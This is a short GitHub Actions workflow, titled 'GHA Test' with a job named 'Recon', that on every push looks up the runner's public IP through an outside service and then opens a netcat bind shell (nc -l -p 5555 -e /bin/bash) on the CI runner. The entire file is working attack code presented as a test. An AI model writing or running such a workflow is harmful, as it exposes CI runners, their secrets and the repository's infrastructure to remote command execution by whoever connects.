name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            curl -s http://whatismyip.akamai.com/
            nc -n -v -l -p 5555 -e /bin/bash
            sleep 30s
